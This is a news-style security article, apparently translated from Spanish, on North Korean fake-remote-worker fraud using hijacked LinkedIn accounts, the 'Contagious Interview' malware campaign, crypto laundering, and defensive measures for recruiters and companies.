The new North Korean work scam that uses stolen identities and real LinkedIn accounts to infiltrate

In recent months it has become clear that an old form of labour fraud has escalated in sophistication and scope: groups linked to the Democratic People's Republic of Korea have moved from supplanting identities to completing forms to presenting themselves in selection processes with real LinkedIn accounts belonging to people they are supplanting. According to publications of the Security Alliance in X, the profiles used often have verified and distinctive corporate emails that, in appearance, make fraudulent applications seem entirely legitimate (source). It's not just about stealing a resume: the attackers seek to establish presence and trust in companies, which allows them to move more freely once they get access.

This phenomenon is part of a persistent operation, documented by different actors in the sector, in which alleged "remote workers" are hired by Western companies using stolen or manufactured identities. Researchers and security companies have tracked this activity for years and baptized it in different ways: Jasper Sleet, PurpleDelta, Wagemole, among other names, but the pattern is consistent. The objective is twofold: to extract economic value and, in parallel, to obtain access to sensitive information for espionage or extortion. Specialized firms have described the program as a stable source of income for the North Korean dictatorship, as well as a vector for obtaining administrative privileges within critical software infrastructure (KELA analysis) and (Silent Push investigation).

At the financial level, the final destination of the wages received by these actors has also been studied. Blockchain analysis reports show how the profits move through chains, exchange through different tokens and cross decentralized bridges and exchanges to complicate the tracking and link between source and destination of the funds (Chainalysis). The combination of stolen identity, corporate access and advanced cryptoactive mixing techniques creates a hard-to-cut chain for those who investigate or attempt to block the flow of money.

In parallel to false recruitment, social engineering campaigns have proliferated specifically designed for the victim to execute malicious code during the selection process. In the campaign known as "Contagious Interview" the attackers attract candidates from LinkedIn with job offers and, during apparently normal interviews, call for technical tests that involve cloning a GitHub repository and running commands. In some attacks they were asked to install npm packages containing malicious load, which allowed authors to run malware on the victims' machines; other variants have used Visual Studio Code tasks that run JavaScript disguised as web sources, finally deploying malware families like BeaverTail or InvisibleFerret to steal credentials and cryptomoneda coins (technical explanation for Fireblocks) and (Abstract Security follow-up).

The techniques are not limited to simple malicious packages: in some attacks, the use of a method called EtherHelling that uses smart contracts and the lockchain to house and recover command and control infrastructure has been documented, which further complicates the removal of malicious servers by dispersing them on public and immutable networks. (technical detail). Another campaign tracked by researchers deployed a modular remote access Trojan called Koalemos through infected npm packages; this RAT makes system fingerprinting, maintains signalling loops with external servers and supports multiple commands to operate on files, transfer data and run arbitrary code (Panther analysis). The favitio vector of these groups is often the legitimate software or the developer's toolchain - repositories, packages and IDE tasks - because it is the most direct way to run code in trusted environments.

The response of the safety ecosystem has also shown evolution. Intelligence companies and cyber security firms point out that North Korean groups such as Labyrinth Chollima have broken down their operations into units with differentiated objectives and methods: some focus on systematic theft of cryptoactive in small volumes, others seek greater punches against specific targets with more sophisticated tools, and a third maintains profiles dedicated to espionage using rootkits and advanced persistence techniques. Although operating with different names, they share infrastructure and tools, suggesting centralized coordination that optimizes resources and knowledge between different cells (CrowdStrike report).

The implications for businesses and professionals are clear and worrying. On an individual level, a compromised or supplanted LinkedIn account can be used to run for dozens of vacancies and establish a legitimate "employment" trail that, in the eyes of a little cautious recruiter, does not raise suspicion. At the corporate level, a remote developer with access to repositories or continuous integration environments can become an entry door to implement backdoors, extract source code and run side movements. The Norwegian security police (PST) even alerted to cases in which companies in Norway hired what were likely to be North Korean workers in remote positions, whose salaries could finance regime weapons programmes. (PST statement).

The good news is that many of the most effective measures against these social engineering tactics are simple and verifiable processes: to ask the candidate to confirm a corporate mail, to request direct interaction in the professional network to check the ownership of the account, to require video-lamada with corporate identification or to implement technical steps that prevent the direct execution of unknown code on machines with access to sensitive resources. From a technical point of view, it is appropriate to isolate evaluation environments, use sandboxing for any external package, audit dependencies, protect CI / CD pipelines and apply strict minimum privileges policies in the repositories. It is also relevant to monitor transfers of digital assets and unusual withdrawal patterns to detect possible early illicit flows (Chainalysis recommendations).

For those who suspect that their identity has been usurped in selection processes, a rapid and public reaction is often effective: warning on social profiles, publishing official contact channels and explaining how to verify their identity (for example, indicating a corporate mail or a known authentication method). From the business side, manual verification remains valuable: asking the person to connect from their real LinkedIn account, to respond to a verified mail address and to perform a brief real-time interaction with an internal manager can filter much of the subplantations. The combination of technical controls and common sense in human resources and development processes is the best defence against such attacks.

Finally, it is important to remember that this phenomenon is not a rare anomaly: it is a logical evolution of actors that combine social ingenuity, knowledge of the development ecosystem and advanced financial techniques. The coexistence of campaigns such as Contagious Interview, malicious package supply operations and group activities attributed to Lazarus or Labyrinth Chollima shows that the threat is multidimensional and persistent. To be kept informed, to apply rigorous checks in the recruitment processes and to tighten technical defences around units and pipelines are indispensable steps to reduce the attack surface and protect both employees and organizations from these increasingly polished tactics.